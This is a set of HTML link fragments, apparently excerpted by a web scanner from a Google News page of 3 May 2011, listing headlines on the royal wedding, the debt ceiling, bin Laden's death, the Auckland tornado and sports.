<span><a target="_blank" class="usg-AFQjCNGF7vXuoKiRaV6hVfOkInFLqn9XdQ did-e5f8e1be7bc4b58 article" href="http://latimesblogs.latimes.com/gossip/2011/05/royal-honeymoon-prince-william-kate-middleton-hollywood.html" id="MAA4AEgMUAVgAmoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGC6FBCb-Et9HJSTuCJDt4cCVGN1w did-32e03e015d0fbe7c article" href="http://perezhilton.com/2011-05-03-royal-couple-coming-to-hollywood" id="MAA4AEgMUAZgAmoCdXM"><span class="titletext">
...[SNIP]...
<span class="wikisense-link">&nbsp;- <a target="_blank" href="http://en.wikipedia.org/wiki/Catherine,_Duchess_of_Cambridge" class="usg-AFQjCNEbjaHvE222NH45U-EK-iQJNaRN9Q ">Wikipedia:&nbsp;Catherine, Duchess of Cambridge</a>
...[SNIP]...
<div class="thumbnail" style="visibility:hidden;"><a target="_blank" href="http://green.blogs.nytimes.com/?p=100699" class="usg-AFQjCNEfDtcXRc4cHKHJhsDvdZmMfugRUQ did-22bb8b897d771fb1 article" title="New York Times (blog)"><img alt="" class="late-tbn" src="http://www.gstatic.com/news/img/cleardot.gif" name="http://nt2.ggpht.com/news/tbn/4hY_tmIwXODj8M/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://green.blogs.nytimes.com/?p=100699" class="usg-AFQjCNEfDtcXRc4cHKHJhsDvdZmMfugRUQ did-22bb8b897d771fb1 article"> New York Ti... </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNF3mcEJaCvUfwzf-v1ZQRoj7oaCqA did-22bb8b897d771fb1 article" href="http://www.time.com/time/world/article/0,8599,2069237,00.html" id="MAA4AEgNUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://www.csmonitor.com/World/Asia-Pacific/2011/0503/Japan-s-nuclear-energy-debate-some-see-spur-for-a-renewable-revolution" target="_blank" class="usg-AFQjCNEdk40bvZdT_OfL0TH47hpGhkKUiA did-7ba0f317db222740 article" id="MAA4AEgNUAFgAmoCdXM">Japan&#39;s nuclear energy debate: some see spur for a renewable revolution</a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.reuters.com/article/2011/05/03/us-japan-moodys-fiscal-idUSTRE7421Y420110503" target="_blank" class="usg-AFQjCNHvQW9BRKz1mtIZkRDVfa_Ft6eJmQ did-f63fcfa78eed859 article" id="MAA4AEgNUAJgAmoCdXM">Japan&#39;s power problems raise fiscal uncertainty: Moody&#39;s</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFlAokf_hm28oc7BP0sWV76MsaUCA did-6269dbf249b00896 article" href="http://www.monstersandcritics.com/news/asiapacific/news/article_1636717.php/Japan-quake-evacuees-still-have-to-live-in-squalid-conditions" id="MAA4AEgNUARgAmoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style="visibility:hidden;"><a target="_blank" href="http://www.bbc.co.uk/go/rss/int/news/-/news/business-13264170" class="usg-AFQjCNEduokjbdMGvWV0Oe0qyihHC9UMrw did-bf139559d39762c0 article" title="BBC News"><img alt="" class="late-tbn" src="http://www.gstatic.com/news/img/cleardot.gif" name="http://nt3.ggpht.com/news/tbn/U8G0Affk1gnGrM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.bbc.co.uk/go/rss/int/news/-/news/business-13264170" class="usg-AFQjCNEduokjbdMGvWV0Oe0qyihHC9UMrw did-bf139559d39762c0 article"> BBC News </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNEdqB9SfOhVk_f3vAcTLwvEzsQuRQ did-bf139559d39762c0 article" href="http://www.bloomberg.com/news/2011-05-03/washington-day-ahead-geithner-gives-debt-negotiators-more-time.html" id="MAA4AEgOUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://www.washingtonpost.com/blogs/ezra-klein/post/wonkbook-the-debt-ceiling-drama-begins/2011/04/27/AFTjZKfF_blog.html" target="_blank" class="usg-AFQjCNH4jmlEkFQXiA_rdISRoIrVCWrsjQ did-d3ca2cf4471ef45f article" id="MAA4AEgOUAFgAmoCdXM">Wonkbook: The debt-ceiling drama begins</a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.allheadlinenews.com/articles/90047157?Geithner%20warns%20of%20Washington%20failing%20to%20cover%20debts%20after%20Aug.%202" target="_blank" class="usg-AFQjCNGBmf3M7_aSVgpaQrEdq-xv_mKv_g did-a79e4c108beaa581 article" id="MAA4AEgOUAJgAmoCdXM">Geithner warns of Washington failing to cover debts after Aug. 2</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNEZZjunRTVKnJIFigqy7Xn1NTIDPA did-d426931da4443074 article" href="http://wmuk.org/news/?select_article=1&amp;pkeyNewsItemID=186594" id="MAA4AEgOUANgAmoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNEkmIVMn1TmAHxG6x4jBr8jO0PpLw did-9de464e62e3be842 article" href="http://www.latimes.com/news/nationworld/nation/la-na-congress-debt-20110501,0,5870759.story" id="MAA4AEgOUARgAmoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNH3fkTe6nJbtMI7kKjlAWviZ0_tGQ did-25bda7370597aadd article" href="http://www.foxnews.com/politics/2011/05/01/bachmann-dismisses-debt-ceiling-warnings/" id="MAA4AEgOUAVgAmoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFs2lDF1Qd-Owl_BGgmJJOlj08lGQ did-76af358ff44f7109 article" href="http://www.sltrib.com/sltrib/opinion/51721214-82/debt-federal-limit-government.html.csp" id="MAA4AEgOUAZgAmoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style="visibility:hidden;"><a target="_blank" href="http://www.nydailynews.com/entertainment/tv/2011/05/03/2011-05-03_dancing_with_the_stars_week_7_chelsea_kane_mark_ballas_perform_intense_paso_dobl.html" class="usg-AFQjCNHlxg8SiGsO21iGXGuUCp4quOW9jg did-33097af48eb09524 article" title="New York Daily News"><img alt="" class="late-tbn" src="http://www.gstatic.com/news/img/cleardot.gif" name="http://nt1.ggpht.com/news/tbn/eZ2N6GcWSJzbfM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.nydailynews.com/entertainment/tv/2011/05/03/2011-05-03_dancing_with_the_stars_week_7_chelsea_kane_mark_ballas_perform_intense_paso_dobl.html" class="usg-AFQjCNHlxg8SiGsO21iGXGuUCp4quOW9jg did-33097af48eb09524 article"> New York Da... </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNEMMbjcyPKIeLfHFx9IlqaZe_lwzg did-33097af48eb09524 article" href="http://www.mtv.com/news/articles/1663128/dancing-with-the-stars-recap-ralph-macchio.jhtml" id="MAA4AEgPUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://www.hollywoodreporter.com/news/dancing-recap-ralph-macchio-hines-184310" target="_blank" class="usg-AFQjCNHTRvze4JaPhHFWFfTDmNV0uSMhEg did-71bababa5fb255d4 article" id="MAA4AEgPUAFgAmoCdXM">&#39;Dancing&#39; Recap: Ralph Macchio, Hines Ward Earn Top Scores</a>
...[SNIP]...
<div class="aa-inner"><a href="http://espn.go.com/espn/page2/index?id=6470360" target="_blank" class="usg-AFQjCNFGq1eAEJL7aGVfrj0HsBlsucimjg did-aacda889b745a4e article" id="MAA4AEgPUAJgAmoCdXM">Hines Ward still on top of &#39;Dancing with the Stars&#39;</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFRCnG7eG5czuW97LDvUBCRP6TB5w did-2fba8a4108ec3b3e article" href="http://smallscreenscoop.com/dancing-with-the-stars-2011-chelsea-kane/315027/" id="MAA4AEgPUANgAmoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNEH2HTWkklLKSfU34PbMpRy6Z0KQQ did-4657bad48feaeb54 article" href="http://www.newsnet5.com/dpp/entertainment/macchio-andward-earn-top-scores-in-dancing-with-the-stars" id="MAA4AEgPUARgAmoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNENJfVTfrb-9ekgM2GWo5EAPk88UA did-9a67356153d6d96 article" href="http://www.nj.com/entertainment/tv/index.ssf/2011/05/dancing_with_the_stars_karate.html" id="MAA4AEgPUAVgAmoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGVc04awNAMQM4-nxV_z29VNOvzJA did-f3d40eae4ac81a79 article" href="http://content.usatoday.com/communities/entertainment/post/2011/05/dancing-recap-doing-double-duty-1/1" id="MAA4AEgPUAZgAmoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style="visibility:hidden;"><a target="_blank" href="http://www.cbc.ca/news/world/story/2011/05/03/new-zealand-auckland-tornado.html" class="usg-AFQjCNEr1tC8qFhFwVmjq28TpEjh0ijtcg did-2417620aa6065b2d article" title="CBC.ca"><img alt="" class="late-tbn" src="http://www.gstatic.com/news/img/cleardot.gif" name="http://nt0.ggpht.com/news/tbn/BDzqhpdmsn7LIM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.cbc.ca/news/world/story/2011/05/03/new-zealand-auckland-tornado.html" class="usg-AFQjCNEr1tC8qFhFwVmjq28TpEjh0ijtcg did-2417620aa6065b2d article"> CBC.ca </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNGkvphqIPTe4CWbiTDE0fd4_9iG2Q did-2417620aa6065b2d article" href="http://www.nzherald.co.nz/nz/news/article.cfm?c_id=1&amp;objectid=10723163" id="MAA4AEgQUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<span class="yt-holder"><img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></span>
...[SNIP]...
<noscript><a href="http://www.youtube.com/watch?v=KT3ywWMiSfA">Video:&nbsp;
Amateur video: Freak tornado rips off roofs, flips cars in New Zealand
<img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.voanews.com/english/news/asia/east-pacific/Deadly-Tornado-Strikes-New-Zealands-Largest-City-121144389.html" target="_blank" class="usg-AFQjCNFH3CYQ5J5ZJZwlQveDYPipdjP2kg did-2e3f45c2db59103c article" id="MAA4AEgQUAFgAmoCdXM">Deadly Tornado Strikes New Zealand&#39;s Largest City</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHrbhZndwM5gP3kGhSXSWeqmYl4mQ did-226c3225a3dee92a article" href="http://www.npr.org/templates/story/story.php?storyId=135944781" id="MAA4AEgQUAJgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNEu4x02Ept8NT0IpZNUyR1dHqY1rg did-f54c82d0322f03d0 article" href="http://online.wsj.com/article/SB10001424052748703922804576300332660438732.html" id="MAA4AEgQUANgAmoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGN0fpFgRmzRvZez6upP8lLiqzHqA did-e320bb5752df669e article" href="http://tvnz.co.nz/national-news/tales-heroism-emerge-tornado-4153399" id="MAA4AEgQUAVgAmoCdXM"><span class="titletext">
...[SNIP]...
<span class="wikisense-link">&nbsp;- <a target="_blank" href="http://en.wikipedia.org/wiki/Tornadoes_of_2011" class="usg-AFQjCNFsWwoasoa5KzAio4Mnpi4mBOHm1Q ">Wikipedia:&nbsp;Tornadoes of 2011</a>
...[SNIP]...
<div class="thumbnail" style="visibility:hidden;"><a target="_blank" href="http://www.foxnews.com/politics/2011/04/30/obamas-jokes-target-trump-white-house-correspondents-dinner/" class="usg-AFQjCNFTToT0yltd4f1RANZM79RNWa4w_w did-b48057222adab79f article" title="Fox News"><img alt="" class="late-tbn" src="http://www.gstatic.com/news/img/cleardot.gif" name="http://nt3.ggpht.com/news/tbn/11LoxLZJHFuVBM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.foxnews.com/politics/2011/04/30/obamas-jokes-target-trump-white-house-correspondents-dinner/" class="usg-AFQjCNFTToT0yltd4f1RANZM79RNWa4w_w did-b48057222adab79f article"> Fox News </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNEWd_D2fL7X16ZkoEhD5YAX4xxeWQ did-b48057222adab79f article" href="http://www.bloomberg.com/news/2011-05-03/nbc-says-trump-s-reality-show-goes-on-as-he-says-he-ll-seek-presidency.html" id="MAA4AEgRUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<span class="yt-holder"><img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></span>
...[SNIP]...
<noscript><a href="http://www.youtube.com/watch?v=97velahw13I">Video:&nbsp;
Trump congratulates Obama on Bin Laden killing
<img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.huffingtonpost.com/2011/05/03/trump-bin-laden_n_856721.html" target="_blank" class="usg-AFQjCNE9VxjC_cox5BltrnYpilVFatNdMQ did-87d410b7240cf4bc article" id="MAA4AEgRUAFgAmoCdXM">Donald Trump On Osama Bin Laden: &#39;I Hope He Really Suffered A Lot&#39;</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHlNY3Wh4xo5YpeXVkJIZa3jRSPaA did-40074719ee4bfcba article" href="http://www.politico.com/news/stories/0511/54037.html" id="MAA4AEgRUAJgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNEdi-Qhd_RvcmATHC3DrW4nGwVYWw did-63f5a58f43277ec8 article" href="http://www.foxnews.com/entertainment/2011/05/02/donald-trump-fires-david-letterman-calls-racist/?test=faces" id="MAA4AEgRUANgAmoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNEVg-Oi6asFZ5q32Fs3nkdX6U85SA did-12317dd3ccabad14 article" href="http://www.reuters.com/article/2011/05/02/us-donaldtrump-idUSTRE7415I720110502" id="MAA4AEgRUARgAmoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNF5L2myF3sgDjdUf9A6gvdh0w9U-w did-4b3595cbc693b2fa article" href="http://www.sltrib.com/sltrib/opinion/51712141-82/obama-president-black-released.html.csp" id="MAA4AEgRUAVgAmoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style="visibility:hidden;"><a target="_blank" href="http://www.dailymail.co.uk/health/article-1382805/Muffin-Tops-beer-belly-double-heart-disease-risk.html?ito=feeds-newsxml" class="usg-AFQjCNGNuiCMshKvLhJJTNMvh8Plq9Ejuw did-b290ff488cbc9fe6 article" title="Daily Mail"><img alt="" class="late-tbn" src="http://www.gstatic.com/news/img/cleardot.gif" name="http://nt2.ggpht.com/news/tbn/csAV-e4bBAuNqM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.dailymail.co.uk/health/article-1382805/Muffin-Tops-beer-belly-double-heart-disease-risk.html?ito=feeds-newsxml" class="usg-AFQjCNGNuiCMshKvLhJJTNMvh8Plq9Ejuw did-b290ff488cbc9fe6 article"> Daily Mail </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNFeGwZVrWH3JhNWkRdMA5ThiISFsg did-b290ff488cbc9fe6 article" href="http://www.allheadlinenews.com/articles/90047162?Heart%20patients%20with%20belly%20fat%20at%20higher%20risk%20of%20death" id="MAA4AEgSUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://www.webmd.com/heart-disease/news/20110502/belly-fat-in-heart-patients-raises-death-risk" target="_blank" class="usg-AFQjCNHYKHpK7YQrUDjW6V-UYXUy5Q_xCA did-a008605c569838dc article" id="MAA4AEgSUAFgAmoCdXM">Belly Fat in Heart Patients Raises Death Risk</a>
...[SNIP]...
<div class="aa-inner"><a href="http://online.wsj.com/article/SB10001424052748704569404576299440848946156.html?mod=googlenews_wsj" target="_blank" class="usg-AFQjCNH3Tc3PwiaT3674H0Yjx4RG4F49-A did-cdb69ede5c43ee0b article" id="MAA4AEgSUAJgAmoCdXM">Bigger the Belly, the Bigger the Risk</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNF57xF4Ra20rtx81raAhq5jgHZhOg did-d641a648908d4a86 article" href="http://www.latimes.com/health/boostershots/la-heb-bellyfat-heart-20110502,0,5268292.story" id="MAA4AEgSUANgAmoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFmRaorcj8YenuNpYHAFco6j3IWyA did-24e04a3427b14d14 article" href="http://www.cnn.com/2011/HEALTH/05/02/waist.size.predicts.heart.disease/?hpt=Sbin" id="MAA4AEgSUARgAmoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHTfPSNlECYf-_dCRFaRw5OC58hDg did-cd9c7252317108a1 article" href="http://timesofindia.indiatimes.com/life-style/health-fitness/health/Beer-belly-ups-death-risk-in-heart-patients/articleshow/8150345.cms" id="MAA4AEgSUAVgAmoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNEk_wV0usuV-OF9Bq3kqbK_lodcIg did-c802535a8b675256 article" href="http://health.usnews.com/health-news/family-health/womens-health/articles/2011/05/02/belly-fat-43-heart-disease-can-be-deadly-study.html" id="MAA4AEgSUAZgAmoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style="visibility:hidden;"><a target="_blank" href="http://www.ctv.ca/CTVNews/TopStories/20110502/al-qaeda-leadership-known-contenders-110502/" class="usg-AFQjCNEeiaKb3ELmL9it8vHvambUUaNtYw did-7fe473a46aa50446 article" title="CTV.ca"><img alt="" class="late-tbn" src="http://www.gstatic.com/news/img/cleardot.gif" name="http://nt3.ggpht.com/news/tbn/Cy-iTBPKyYBzqM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.ctv.ca/CTVNews/TopStories/20110502/al-qaeda-leadership-known-contenders-110502/" class="usg-AFQjCNEeiaKb3ELmL9it8vHvambUUaNtYw did-7fe473a46aa50446 article"> CTV.ca </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNHYjVOY7t8oGqy3FXMrxme4S7S6Rw did-7fe473a46aa50446 article" href="http://www.smh.com.au/world/zawahiri-poised-to-assume-mantle-20110503-1e6w9.html" id="MAA4AEgTUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://www.time.com/time/world/article/0,8599,2069247,00.html" target="_blank" class="usg-AFQjCNHIH5aPqCEqsoITZ4K1AYuNp2lVRA did-2f5176b8fbac4ff4 article" id="MAA4AEgTUAFgAmoCdXM">Al-Qaeda&#39;s Big Post-bin Laden Cash Crunch</a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.msnbc.msn.com/id/42865695/ns/world_news-death_of_bin_laden/" target="_blank" class="usg-AFQjCNHlPedUvqrIYMoyxTq0tF8rhjRhGQ did-739bd7ca894b1aef article" id="MAA4AEgTUAJgAmoCdXM">Bin Laden lieutenant now among most wanted</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNEDz29pT8v9t0ONzGe1B51siY2sXg did-5181e04148abdc46 article" href="http://globalpublicsquare.blogs.cnn.com/2011/05/03/can-al-qaeda-survive-bin-laden%E2%80%99s-death/" id="MAA4AEgTUANgAmoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHxRQ5HWFJadVfgc5GdWZQwApCCvg did-497a08589d3fce94 article" href="http://www.voanews.com/english/news/usa/US-Officials-Warn-Terrorism-Threat-Remains-Post-bin-Laden-121143409.html" id="MAA4AEgTUARgAmoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFt0RJdovBIqE8wyn72yI-iyE9_Jg did-ffdb251b5a6c69ff article" href="http://gulfnews.com/news/region/egypt/egyptian-tourism-feels-the-pinch-of-bin-laden-s-slaying-1.802717" id="MAA4AEgTUAVgAmoCdXM"><span class="titletext">
...[SNIP]...
<span class="wikisense-link">&nbsp;- <a target="_blank" href="http://en.wikipedia.org/wiki/Osama_bin_Laden" class="usg-AFQjCNEKo9yI_sBXiibPflm8RMV-0xg2hw ">Wikipedia:&nbsp;Osama bin Laden</a>
...[SNIP]...
<div class="thumbnail" style="visibility:hidden;"><a target="_blank" href="http://espn.go.com/blog/boston/bruins/post?id=5074" class="usg-AFQjCNHEonFiIQRpzyVNcCVW6RXEgyN1pQ did-a63bf8b9e5772658 article" title="ESPN (blog)"><img alt="" class="late-tbn" src="http://www.gstatic.com/news/img/cleardot.gif" name="http://nt0.ggpht.com/news/tbn/fGKioz6ODujuJM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://espn.go.com/blog/boston/bruins/post?id=5074" class="usg-AFQjCNHEonFiIQRpzyVNcCVW6RXEgyN1pQ did-a63bf8b9e5772658 article"> ESPN (blog) </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNGwJAZJjuqlZMY4i9zDiIX7MAnz6w did-a63bf8b9e5772658 article" href="http://espn.go.com/blog/boston/bruins/post/_/id/5099/krejci-comes-up-big-again-for-bruins" id="MAA4AEgUUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://www.phillyburbs.com/sports/flyers/deja-vu-for-flyers/article_075ac879-13f3-5d5f-8728-8d69d123e764.html" target="_blank" class="usg-AFQjCNGINFTGSE5bT4DLIisa2LnNoMaXew did-a641b642b1ce1b6b article" id="MAA4AEgUUAFgAmoCdXM">Deja vu for Flyers</a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.philly.com/philly/columnists/sam_donnellon/121140029.html" target="_blank" class="usg-AFQjCNGsitvX9eOHExcPdHi8Y2XBcs2pdA did-cb45dfcaf0ffb51c article" id="MAA4AEgUUAJgAmoCdXM">Now Flyers take their act on the road | Philadelphia Daily News | 2011-05-03</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFcGnMI_u0s3awGXiphNF9zkgh5Eg did-bde7c3acb03a8c40 article" href="http://www.rotoworld.com/content/playerpages/playerbreakingnews.asp?sport=NHL&amp;id=2230&amp;line=135057&amp;spln=1" id="MAA4AEgUUANgAmoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNET-qrUnqlK2vltL1DIO5K65p9e4g did-2630c913ea3c86 article" href="http://www.nashuatelegraph.com/sportsnhl/917925-222/bruins-flyers-take-game-2-battle-into.html" id="MAA4AEgUUARgAmoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFiGmTAkxIul0Ll_mbtZocSPkdD0g did-69d088a49778ea2f article" href="http://www.bostonherald.com/sports/hockey/bruins/view/2011_0503save_by_thomas_52_reasons_to_stop_and_admire_goalies_work/" id="MAA4AEgUUAVgAmoCdXM"><span class="titletext">
...[SNIP]...
<div class="thumbnail" style="visibility:hidden;"><a target="_blank" href="http://www.guardian.co.uk/commentisfree/2011/may/03/muammar-gaddafi-target-nato" class="usg-AFQjCNGSzsb0W7CoN4sReGURUumq10-DtQ did-69751656047f7b17 article" title="The Guardian"><img alt="" class="late-tbn" src="http://www.gstatic.com/news/img/cleardot.gif" name="http://nt2.ggpht.com/news/tbn/4shrWMuiJtRkZM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.guardian.co.uk/commentisfree/2011/may/03/muammar-gaddafi-target-nato" class="usg-AFQjCNGSzsb0W7CoN4sReGURUumq10-DtQ did-69751656047f7b17 article"> The Guardia... </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNFPloh487xwK_BVbNPpw2FujrCBmw did-69751656047f7b17 article" href="http://www.businessweek.com/news/2011-05-03/erdogan-promises-plan-to-end-libyan-war-as-qaddafi-buries-son.html" id="MAA4AEgVUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<span class="yt-holder"><img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></span>
...[SNIP]...
<noscript><a href="http://www.youtube.com/watch?v=pxDkFWfcgas">Video:&nbsp;
NATO airstrikes counter bombing by Gaddafi forces
<img class="youtube-icon icon" src="http://www.gstatic.com/news/img/cleardot.gif" alt="" width="16" height="16"></a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.guardian.co.uk/commentisfree/2011/may/03/muammar-gaddafi-target-nato" target="_blank" class="usg-AFQjCNGSzsb0W7CoN4sReGURUumq10-DtQ did-eb7b83a6be3a3bb8 article" id="MAA4AEgVUAFgAmoCdXM">Gaddafi is a legitimate target</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNEkOKYrpblN6ykoes1j17O0B3CLdw did-d264925d2e7bb18e article" href="http://www.bbc.co.uk/go/rss/int/news/-/news/world-africa-13260343" id="MAA4AEgVUAJgCGoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHiGCr-lBSV_k2mUIO-69Vd1bksaQ did-c44b22fec1953a67 article" href="http://english.aljazeera.net/news/africa/2011/05/20115213422723796.html" id="MAA4AEgVUANgAmoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNH1zivvhQv3D9eiu0-HjumZBu2J8w did-990b695d90aa95b3 article" href="http://feeds.washingtonpost.com/click.phdo?i=5c00d5f3e755942f58b162912cdab66d" id="MAA4AEgVUARgAmoCdXM"><span class="titletext">
...[SNIP]...
<span class="wikisense-link">&nbsp;- <a target="_blank" href="http://en.wikipedia.org/wiki/Saif_al-Arab_al-Gaddafi" class="usg-AFQjCNE_j3JU7ohvGXiLTf9v_yPsNVvNUg ">Wikipedia:&nbsp;Saif al-Arab al-Gaddafi</a>
...[SNIP]...
<div class="thumbnail" style="visibility:hidden;"><a target="_blank" href="http://www.theglobeandmail.com/sports/baseball/red-sox-hand-jered-weaver-first-loss/article2007699/" class="usg-AFQjCNGF7UT4H9grgBxxFVsCxNyaF3k7WQ did-70405f075371970 article" title="Globe and Mail"><img alt="" class="late-tbn" src="http://www.gstatic.com/news/img/cleardot.gif" name="http://nt2.ggpht.com/news/tbn/uvLH2K135lU2iM/6.jpg" width="80" height="80"></a> <div class="source "> <a target="_blank" href="http://www.theglobeandmail.com/sports/baseball/red-sox-hand-jered-weaver-first-loss/article2007699/" class="usg-AFQjCNGF7UT4H9grgBxxFVsCxNyaF3k7WQ did-70405f075371970 article"> Globe and M... </a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNFronrCSYdfqjPn0YlJmn2lUie2fA did-70405f075371970 article" href="http://www.bostonherald.com/sports/baseball/red_sox/view/2011_0503pedroias_one_tough_act_key_at-bat_sinks_la/srvc=sports&amp;position=recent_bullet" id="MAA4AEgWUABgAWoCdXM"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://mlb.sbnation.com/2011/5/3/2150599/angels-vs-red-sox-clay-buchholz-jered-weaver" target="_blank" class="usg-AFQjCNHdYW2cSE1_qY8XisPImRiJmS7yqQ did-53634e22fe245da6 article" id="MAA4AEgWUAFgAmoCdXM">Angels Vs. Red Sox: Clay Buchholz Bests Jered Weaver In Boston Win</a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.cbssports.com/mlb/gametracker/preview/MLB_20110503_ANA@BOS/angelsred-sox-preview" target="_blank" class="usg-AFQjCNH1QLKss4eSDi2zLiuLGW9sraGrfw did-f5110e474b8b3f2a article" id="MAA4AEgWUAJgAmoCdXM">Angels-Red Sox Preview</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNE4z4bJ4QB3tCtRQjUVF6yOxkSoUw did-589078dc349c4a37 article" href="http://www.boston.com/sports/baseball/redsox/articles/2011/05/03/dream_weaver_start_to_2011_over_after_outing_vs_red_sox/" id="MAA4AEgWUANgAmoCdXM"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNH3ugIvkjhHoFment3P_J9XuXg0zA did-a0bee0ececc16282 article" href="http://www.latimes.com/sports/la-sp-0503-angels-red-sox-20110503,0,2961666.story" id="MAA4AEgWUARgAmoCdXM"><span class="titletext">
...[SNIP]...
<div class="title"><a target="_blank" class="usg-AFQjCNE9Zek57rhQeblnDnuUMwBJVuiaTQ did-381a9a30f4b57566 article" href="http://www.reuters.com/article/2011/05/03/us-obama-statement-idUSTRE74107920110503?feedType=RSS&amp;feedName=topNews" id="4042713150573081958"><span class="titletext">
...[SNIP]...
<div class="title"><a target="_blank" class="usg-AFQjCNGRDb7AsnasBSaOSIR6QWChFqUt-w did-bd3e743ead73affc article" href="http://www.csmonitor.com/World/terrorism-security/2011/0503/Osama-bin-Laden-s-burial-at-sea-critics-range-from-9-11-families-to-militants" id="-4810279539438276612"><span class="titletext">
...[SNIP]...
<div class="title"><a target="_blank" class="usg-AFQjCNFMfaq9mZuyHXuEy_9m-hCK3uIdjg did-cb05ee1d1109f16a article" href="http://www.foxnews.com/world/2011/05/03/1000-arrested-syria-saturday-rights-group-says/" id="-3817383300519300758"><span class="titletext">
...[SNIP]...
<div class="title"><a target="_blank" class="usg-AFQjCNHS4mVCXGXn1rKKk6Vgdf1_NNx5gQ did-54cbf1a309206304 article" href="http://www.baltimoresun.com/news/bs-bz-exelon-ceg-maryland-plants-20110502,0,948617.story?track=rss" id="MAE4AEgAUABgAmoCdXM"><span class="titletext">
...[SNIP]...
